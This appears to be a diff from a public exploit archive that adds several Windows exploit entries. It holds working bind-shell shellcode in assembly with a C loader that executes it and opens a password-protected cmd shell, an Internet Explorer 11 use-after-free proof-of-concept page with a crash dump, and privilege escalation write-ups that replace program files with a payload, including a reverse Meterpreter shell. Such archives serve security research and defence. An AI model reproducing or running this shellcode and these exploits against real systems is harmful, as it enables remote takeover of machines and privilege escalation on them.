add esp,12
;------------------------
;loading ws2_32.dll
cdq
push 0x6c6c6c6c
mov [esp+2],byte dl
push 0x642e3233
push 0x5f327377
lea edx,[esp]
push edx
call eax
;---------------------------------
add esp,12
xchg edi,eax
mov ebx,[edi+0x3c]
add ebx,edi
mov ebx,[ebx+0x78]
add ebx,edi
mov ebx,[ebx+0x1c]
add ebx,edi
cdq
mov dx,456
mov eax,[ebx+edx]
add eax,edi
mov [esi+12],dword eax ;WSAStartup() 12
mov eax,[ebx+80]
add eax,edi
mov [esi+16],dword eax ;setsockopt() 16
mov eax,[ebx+4]
add eax,edi
mov [esi+20],dword eax ;bind() 20
mov eax,[ebx]
add eax,edi
mov [esi+24],dword eax ;accept() 24
mov eax,[ebx+48]
add eax,edi
mov [esi+28],dword eax ;listen() 28
mov eax,[ebx+8]
add eax,edi
mov [esi+32],dword eax ;closesocket() 32
mov eax,[ebx+60]
add eax,edi
mov [esi+36],dword eax ;recv() 36
mov dx,392
mov eax,[ebx+edx]
add eax,edi
mov [esi+40],dword eax ;WSASocketA() 40
mov eax,[ebx+72]
add eax,edi
mov [esi+44],dword eax ;send() 44
;---------------------------------
cdq
lea ecx,[esi+48]
mov [ecx],byte 2
mov [ecx+2],word 0x5c11
mov [ecx+4],edx
mov [ecx+8],edx
mov [ecx+12],edx
lea ecx,[esi+64]
mov [ecx],dword 'Ente'
mov [ecx+4],dword 'r pa'
mov [ecx+8],dword 'ss c'
mov [ecx+12],dword 'ode:'
;-----------------------------------
;WSAStartup(514,&WSADATA)
cdq
mov dx,400
sub esp,edx
lea ecx,[esp]
add edx,114
push ecx
push edx
call [esi+12]
;--------------------------------
;---------------------------
;;WSASocketA(2,1,6,0,0,0)
cdq
push edx
push edx
push edx
mov dl,6
push edx
cdq
inc edx
push edx
inc edx
push edx
call [esi+40]
xchg edi,eax ;SOCKET
;-------------------------------------
;setsockopt(SOCKET,0xffff,4,&1,2)
cdq
inc edx
push edx
lea ecx,[esp]
inc edx
push edx
push ecx
add edx,2
push edx
cdq
mov dx,0xffff
push edx
push edi
call [esi+16]
;----------------------
;bind(SOCKET,(struct sockaddr *)&struct sockaddr_in,16)
cdq
mov dl,16
push edx
lea ecx,[esi+48]
push edx
push ecx
push edi
call [esi+20]
;----------------------------
;listen(SOCKET,1)
cdq
inc edx
push edx
push edi
call [esi+28]
cdq
lea ebx,[esi+48]
mov [ebx],edx
mov [ebx+4],edx
mov [ebx+8],edx
mov [ebx+12],edx
a:
;-----------------------------
;accept(SOCKET,(struct sockaddr *)&struct sockaddr_in,&16)
cdq
mov dl,16
push edx
lea ecx,[esp]
lea ebx,[esi+48]
push ecx
push ebx
push edi
call [esi+24]
;---------------------------------
;send(SOCKET,char *a[],16,0)
cdq
push eax
push edx
mov dl,16
push edx
lea ecx,[esi+64]
push ecx
push eax
call [esi+44]
;-----------------------
pop eax
;recv(SOCKET,char *a[],16,0)
mov ebx,eax
cdq
push edx
mov dl,16
push edx
lea ecx,[esi+64]
push ecx
push eax
call [esi+36]
;----------------------------------
lea ecx,[esi+64]
cmp dword [ecx],'damn'
jne kick_out
cmp dword [ecx+4],'_it!'
jne kick_out
cmp dword [ecx+8],'$$##'
jne kick_out
cmp dword [ecx+12],'@;*#'
jne kick_out
;password-> damn_it!$$##@;*#
mov edi,ebx
sub esp,16
lea ebx,[esp]
cdq
push edi
push edi
push edi
push edx
push edx
mov dl,255
inc edx
push edx
cdq
push edx
push edx
push edx
push edx
push edx
push edx
push edx
push edx
push edx
push edx
mov dl,68
push edx
lea ecx,[esp]
cdq
push 'cmdA'
mov [esp+3],byte dl
lea eax,[esp]
;-------------------------------------------------
push ebx
push ecx
push edx
push edx
push edx
inc edx
push edx
cdq
push edx
push edx
push eax
push edx
call [esi+4]
push eax
call [esi+8]
kick_out:
push ebx
call [esi+32]
lea ecx,[esi+64]
mov [ecx],dword 'Ente'
mov [ecx+4],dword 'r pa'
mov [ecx+8],dword 'ss c'
mov [ecx+12],dword 'ode:'
jmp a
*/
#include<windows.h>
#include<stdio.h>
#include<shellapi.h>
#include<stdlib.h>
char shellcode[]="\x99\x64\x8b\x42\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x78\x10\x8b\x5f\x3c\x01\xfb\x8b\x5b\x78\x01\xfb\x8b\x73\x20\x01\xfe\x42\xad\x01\xf8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xfe\x8b\x0c\x96\x01\xf9\x83\xec\x50\x8d\x34\x24\x89\x0e\x99\x68\x73\x41\x41\x41\x88\x54\x24\x02\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x8d\x14\x24\x52\x57\xff\xd1\x83\xc4\x10\x89\x46\x04\x99\x68\x65\x73\x73\x41\x88\x54\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x14\x24\x52\x57\xff\x16\x83\xc4\x0c\x89\x46\x08\x99\x52\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x8d\x14\x24\x52\x57\xff\x16\x83\xc4\x0c\x99\x68\x6c\x6c\x6c\x6c\x88\x54\x24\x02\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x8d\x14\x24\x52\xff\xd0\x83\xc4\x0c\x97\x8b\x5f\x3c\x01\xfb\x8b\x5b\x78\x01\xfb\x8b\x5b\x1c\x01\xfb\x99\x66\xba\xc8\x01\x8b\x04\x13\x01\xf8\x89\x46\x0c\x8b\x43\x50\x01\xf8\x89\x46\x10\x8b\x43\x04\x01\xf8\x89\x46\x14\x8b\x03\x01\xf8\x89\x46\x18\x8b\x43\x30\x01\xf8\x89\x46\x1c\x8b\x43\x08\x01\xf8\x89\x46\x20\x8b\x43\x3c\x01\xf8\x89\x46\x24\x66\xba\x88\x01\x8b\x04\x13\x01\xf8\x89\x46\x28\x8b\x43\x48\x01\xf8\x89\x46\x2c\x99\x8d\x4e\x30\xc6\x01\x02\x66\xc7\x41\x02\x11\x5c\x89\x51\x04\x89\x51\x08\x89\x51\x0c\x8d\x4e\x40\xc7\x01\x45\x6e\x74\x65\xc7\x41\x04\x72\x20\x70\x61\xc7\x41\x08\x73\x73\x20\x63\xc7\x41\x0c\x6f\x64\x65\x3a\x99\x66\xba\x90\x01\x29\xd4\x8d\x0c\x24\x83\xc2\x72\x51\x52\xff\x56\x0c\x99\x52\x52\x52\xb2\x06\x52\x99\x42\x52\x42\x52\xff\x56\x28\x97\x99\x42\x52\x8d\x0c\x24\x42\x52\x51\x83\xc2\x02\x52\x99\x66\xba\xff\xff\x52\x57\xff\x56\x10\x99\xb2\x10\x52\x8d\x4e\x30\x52\x51\x57\xff\x56\x14\x99\x42\x52\x57\xff\x56\x1c\x99\x8d\x5e\x30\x89\x13\x89\x53\x04\x89\x53\x08\x89\x53\x0c\x99\xb2\x10\x52\x8d\x0c\x24\x8d\x5e\x30\x51\x53\x57\xff\x56\x18\x99\x50\x52\xb2\x10\x52\x8d\x4e\x40\x51\x50\xff\x56\x2c\x58\x89\xc3\x99\x52\xb2\x10\x52\x8d\x4e\x40\x51\x50\xff\x56\x24\x8d\x4e\x40\x81\x39\x64\x61\x6d\x6e\x75\x5e\x81\x79\x04\x5f\x69\x74\x21\x75\x55\x81\x79\x08\x24\x24\x23\x23\x75\x4c\x81\x79\x0c\x40\x3b\x2a\x23\x75\x43\x89\xdf\x83\xec\x10\x8d\x1c\x24\x99\x57\x57\x57\x52\x52\xb2\xff\x42\x52\x99\x52\x52\x52\x52\x52\x52\x52\x52\x52\x52\xb2\x44\x52\x8d\x0c\x24\x99\x68\x63\x6d\x64\x41\x88\x54\x24\x03\x8d\x04\x24\x53\x51\x52\x52\x52\x42\x52\x99\x52\x52\x50\x52\xff\x56\x04\x50\xff\x56\x08\x53\xff\x56\x20\x8d\x4e\x40\xc7\x01\x45\x6e\x74\x65\xc7\x41\x04\x72\x20\x70\x61\xc7\x41\x08\x73\x73\x20\x63\xc7\x41\x0c\x6f\x64\x65\x3a\xe9\x42\xff\xff\xff";
int main(int i,char *a[])
{
int mode;
if(i==1)
mode=1;
else
mode=atoi(a[1]);
switch(mode)
{
case 78:
(* (int(*)())shellcode )();
break;
case 1:
ShellExecute(NULL,NULL,a[0],"78",NULL,0);
default:
break;
}
return 0;
}

107
platforms/windows/dos/40374.html Executable file
View file

@ -0,0 +1,107 @@
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="Expires" content="0" />
<meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" />
<meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" />
<meta http-equiv="Pragma" content="no-cache" />
<style type="text/css">
body{
background-color:lime;
font-color:red;
};
</style>
<script type='text/javascript'></script>
<script type="text/javascript" language="JavaScript">
/*
# Exploit Title: Internet Explorer 11 Use After Free
# Date: 05/09/2016 - 11/09/2016
# Exploit Author: Marcin Ressel
# Vendor Homepage: https://www.microsoft.com/pl-pl/
# Version: 11.0.9600.18482
# Tested on: Windows 7 (x64)
######################################################################################
0:014> g
(13a8.9b8): Access violation - code c0000005 (!!! second chance !!!)
eax=2f66abb0 ebx=00000001 ecx=2fbc8f08 edx=7ef8d000 esi=2fbc8f08 edi=2fbc8f08
eip=6d754a45 esp=1feac660 ebp=1feac674 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
MSHTML!CElement::SecurityContext+0x25:
6d754a45 8b80b8000000 mov eax,dword ptr [eax+0B8h] ds:002b:2f66ac68=????????
0:014> d @eax
2f66abb0 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66abc0 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66abd0 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66abe0 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66abf0 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66ac00 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66ac10 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66ac20 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
0:014> kb
ChildEBP RetAddr Args to Child
1feac660 6d5e7c69 6d5e7500 1feac690 2fbc8f08 MSHTML!CElement::SecurityContext+0x25
1feac674 6d5e75cf 2fbc8f08 2fbc8f08 2fbc8f08 MSHTML!CMediaElement::RemoveFromPlayToElementTracker+0x1d
1feac688 6d5e7bee 1feac6a0 6d5e7bd0 00000004 MSHTML!CMediaElement::Shutdown+0xdc
1feac698 6d5e7b1c 48cfae30 50d00bb0 4542dbd0 MSHTML!CMediaElement::OnMarkupTearDown+0x1e
1feac6c4 6d3b23dc 00000000 4542dbd0 50d00bb0 MSHTML!CMarkup::InvokeMarkupTearDownCallbacks+0xc0
1feac6d8 6d3b22c9 00000001 00000001 341a8bb0 MSHTML!CMarkup::TearDownMarkupHelper+0xe4
1feac700 6d3adf1f 00000001 00000001 1feac7d0 MSHTML!CMarkup::TearDownMarkup+0x58
1feac7b0 6dae9665 341a8bb0 00000000 00000000 MSHTML!COmWindowProxy::SwitchMarkup+0x4eb
1feac894 6dae97e3 00005004 ffffffff 00000000 MSHTML!COmWindowProxy::ExecRefresh+0xa1c
1feac8a8 6d0d763b 457f1f68 00005004 00000001 MSHTML!COmWindowProxy::ExecRefreshCallback+0x23
1feac8f0 6d0cd4e2 91c55b56 00000000 6d0cc800 MSHTML!GlobalWndOnMethodCall+0x17b
1feac944 76b862fa 001401c6 00008002 00000000 MSHTML!GlobalWndProc+0x103
1feac970 76b86d3a 6d0cc800 001401c6 00008002 user32!InternalCallWinProc+0x23
1feac9e8 76b877d3 00000000 6d0cc800 001401c6 user32!UserCallWinProcCheckWow+0x109
1feaca4c 76b8789a 6d0cc800 00000000 1feafc28 user32!DispatchMessageWorker+0x3cb
1feaca5c 6e5fa8ac 1feaca9c 62382e48 2efb2fe0 user32!DispatchMessageW+0xf
1feafc28 6e620e88 1feafcf4 6e620b00 5cba2ff0 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464
1feafce8 74e4ad3c 62382e48 1feafd0c 6e614b00 IEFRAME!LCIETab_ThreadProc+0x3e7
1feafd00 6e593a31 5cba2ff0 00000000 6e5939a0 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1c
1feafd38 6fae9608 4b3b6fe8 705e0368 00000000 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x94
############################################################################################
*/
var doc;
var trg, trg_parent;
function testcase()
{
var e1_frame = document.getElementById("e1");
doc = document;
e = e1_frame.contentWindow.document.createElement("hr");
rf = doc.body.appendChild(e);
e = e1_frame.contentWindow.document.createElement("audio");
rf = doc.body.appendChild(e);
dom = doc.getElementsByTagName("*");
document.getElementById("e1").removeNode(true);
trg = dom[14];
trg_parent = doc.body;
trg.addEventListener('DOMNodeRemoved',
new Function('',
//'try{trg.removeEventListener("DOMNodeRemoved",this,false);}catch(e){}'+
'try{trg.appendChild(document.createElement("feOffset")).removeNode(false).ATTRIBUTE_NODE = "false";}catch(e){}'+
'try{trg_parent = trg.cloneNode(true);}catch(e){}'//+
// 'try{doc = document.implementation.createDocument("about:blank","","text/html");}catch(e){}'
),
false);
trg_parent.innerHTML = trg.innerHTML;
//CollectGarbage();
//trg.innerHTML = "<h1></h1>"
setTimeout('location.reload();',700);
}
</script>
<title>Use After Free</title>
</head>
<body onload='testcase();'>
<iframe></iframe><iframe src='about:blank' id='e1'></iframe>
</body>
</html>
</html>

View file

@ -0,0 +1,59 @@
# Exploit Title: Battle.Net 1.5.0.7963 Local Privilege Escalation
# Date: 11/09/2016
# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Vendor Homepage: www.battle.net
# Software Link: https://eu.battle.net/account/download/
# Version: Version 1.5.0.7963
# Tested on: Windows 10 Professional x64 and Windows XP SP3 x86
1. Description:
Battle.Net installs by default to "C:\Program Files (x86)\Battle.Net" with weak folder permissions granting any built-in user account with full permission to the contents of
the directory and it's subfolders. This allows an attacker opportunity for their own code execution under any other user running the application. This is not limited to just
the Battle.Net directory, but also to any of Blizzards game installation folders as installed by Battle.Net.
2. Proof
C:\Program Files>cacls Battle.net
C:\Program Files\Battle.net BUILTIN\Users:(OI)(CI)F
BUILTIN\Administrators:(OI)(CI)F
CREATOR OWNER:(OI)(CI)F
C:\Program Files>cacls "Diablo III"
C:\Program Files\Diablo III BUILTIN\Users:(OI)(CI)F
BUILTIN\Administrators:(OI)(CI)F
CREATOR OWNER:(OI)(CI)F
C:\Program Files>cacls "StarCraft II"
C:\Program Files\StarCraft II BUILTIN\Users:(OI)(CI)F
BUILTIN\Administrators:(OI)(CI)F
CREATOR OWNER:(OI)(CI)F
C:\Program Files>cacls Hearthstone
C:\Program Files\Hearthstone BUILTIN\Users:(OI)(CI)F
BUILTIN\Administrators:(OI)(CI)F
CREATOR OWNER:(OI)(CI)F
C:\Program Files>cacls "Heroes of the Storm"
C:\Program Files\Heroes of the Storm BUILTIN\Users:(OI)(CI)F
BUILTIN\Administrators:(OI)(CI)F
CREATOR OWNER:(OI)(CI)F
C:\Program Files (x86)>cacls "World of Warcraft"
C:\Program Files (x86)\World of Warcraft BUILTIN\Users:(OI)(CI)F
BUILTIN\Administrators:(OI)(CI)F
CREATOR OWNER:(OI)(CI)F
3. Exploit:
Simply replace any of the game exe's or any of the dll's with your preferred payload and wait for execution.

View file

@ -0,0 +1,27 @@
# Exploit Title: Zapya Desktop Version ('ZapyaService.exe') Privilege Escalation
# Date: 2016/9/12
# Exploit Author: Arash Khazaei
# Vendor Homepage: http://www.izapya.com/
# Software Link: http://binaries.izapya.com/Izapya/Windows_PC/ZapyaSetup_1803_en.exe
# Version: 1.803 (Latest)
# Tested on: Windows 7 Professional X86 - Windows 10 Pro X64
# CVE : N/A
======================
# Description :
# Zapya is a 100% free tool for sharing files across devices like Android, iPhone, iPad, Windows Phone, PC, and Mac computers in an instant.
# Its Easy to use and supports multiple languages. We are already a community of 300 million strong users and growing rapidly.
# When You Install Zapya Desktop , Zapya Will Install A Service Named ZapyaService.exe And It's Placed In Zapya Installation Directory .
# If We Replace The ZapyaService.exe File With A Malicious Executable File It Will Execute As NT/SYSTEM User Privilege.
======================
# Proof Of Concept :
# 1- Install Zapya Desktop .
# 2- Generate A Meterpreter Executable Payload .
# 3- Stop Service And Replace It With ZapyaService.exe With Exact Name.
# 4- Listen Handler For Connection And Start Service Again or Open Zapya Desktop , Application Will Attempt To Start Service
# 5- After Starting Service We Have Reverse Meterpreter Shell With NT/SYSTEM Privilege.
==================
# Discovered By Arash Khazaei
==================

View file

@ -0,0 +1,41 @@
# Exploit Title: WinSMS 3.43 Local Privilege Escalation
# Date: 13/09/2016
# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Vendor Homepage: http://www.winsms.co.za
# Software Link: https://www.winsms.co.za/products/bulk-sms-desktop-software/
# Version: Software Version 3.43, Released September 2015
# Tested on: Windows 10 Professional x64 and Windows XP SP3 x86
1. Description:
WinSMS installs by default to "C:\Program Files (x86)\WinSMS" with very weak folder permissions granting any user full permission to the contents of the directory and it's subfolders. This allows ample opportunity for code execution against any other user running the application. WinSMS is typically configured as a startup program which makes this particularly easy to take leverage.
2. Proof
C:\Program Files>cacls WinSMS
C:\Program Files\WinSMS Everyone:(OI)(CI)F
BUILTIN\Users:R
BUILTIN\Users:(OI)(CI)(IO)(special access:)
GENERIC_READ
GENERIC_EXECUTE
BUILTIN\Power Users:C
BUILTIN\Power Users:(OI)(CI)(IO)C
BUILTIN\Administrators:F
BUILTIN\Administrators:(OI)(CI)(IO)F
NT AUTHORITY\SYSTEM:F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)F
TULPA-842269BBB\Administrator:F
CREATOR OWNER:(OI)(CI)(IO)F
3. Exploit:
Simply replace WinSMS.exe or any of the dll's with your preferred payload and wait for execution.
4. Plain Text Password Disclosure:
It is worth noting that sensitive information such as the proxy server password is stored in plain text within the a database file located at "C:\Program Files (x86)\WinSMS\WinSMS.mdb"

View file

@ -0,0 +1,69 @@
# Exploit Title: Multiple Icecream Apps Local Privilege Escalation
# Date: 13/09/2016
# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Vendor Homepage: icecreamapps.com
# Software Versions Affected: Icecream Ebook Reader 4.21 | Icecream Screen Recorder 4.21 | Icecream Screen Recorder 2.12
# Software Link: http://icecreamapps.com/Ebook-Reader/ | http://icecreamapps.com/Screen-Recorder/ | http://icecreamapps.com/Slideshow-Maker/
# Tested on: Windows 10 Professional x64 and Windows XP SP3 x86
1. Description:
The default installation directory for Icecream Ebook Reader is "C:\Program Files (x86)\Icecream Ebook Reader" with weak folder permissions that grants EVERYONE change/modify
privileges to the contents of the directory and it's subfolders. This allows an attacker opportunity for their own code execution under any other user running the
application. The same vulnerability exists for "Icecream Screen Recorder" as well as "Icecream Slideshow Maker".
2. Proof
C:\Program Files (x86)>icacls "Icecream Ebook Reader"
Icecream Ebook Reader Everyone:(OI)(CI)(M)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
C:\Program Files (x86)>icacls "Icecream Screen Recorder"
Icecream Screen Recorder Everyone:(OI)(CI)(M)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
C:\Program Files\Icecream Slideshow Maker Everyone:(OI)(CI)C
BUILTIN\Users:R
BUILTIN\Users:(OI)(CI)(IO)(special access:)
GENERIC_READ
GENERIC_EXECUTE
BUILTIN\Power Users:C
BUILTIN\Power Users:(OI)(CI)(IO)C
BUILTIN\Administrators:F
BUILTIN\Administrators:(OI)(CI)(IO)F
NT AUTHORITY\SYSTEM:F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)F
TULPA-842269BBB\Administrator:F
CREATOR OWNER:(OI)(CI)(IO)F
3. Exploit:
Simply replace any of the application exe's or any of the dll's with your preferred payload and wait for execution.

View file

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/1976/info
Windows Media Player is an application used for digital audio, and video content viewing.
It is possible for a user running Windows Media Player 7 to enable a skin (.wms) file and unknowingly execute an embedded malicious script. When a user attempts to retrieve a skin (.wms) file it is downloaded and resides on the user's local machine. If Windows Media Player is run with the malicious skin enabled, the Active X component would allow any arbitrary action to be achieved. Depending on internet security settings this vulnerability is also exploitable if the skin file in question resides on a web site. The script could automatically launch when a user visits the web site.
Execution of arbitrary scripts could make it possible for the malicious host to gain rights equivalent to those of the current user.
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20424.zip

View file

@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7539/info
Internet Explorer is reported to be vulnerable to a zone bypass issue. Allegedly, if Internet Explorer attempts to open a web page containing numerous 'file://' requests each contained in a separate Iframe, the requested file will eventually be executed in the Local Computer zone.
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22575.rar
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22575.rar (dmz.rar Password: zones)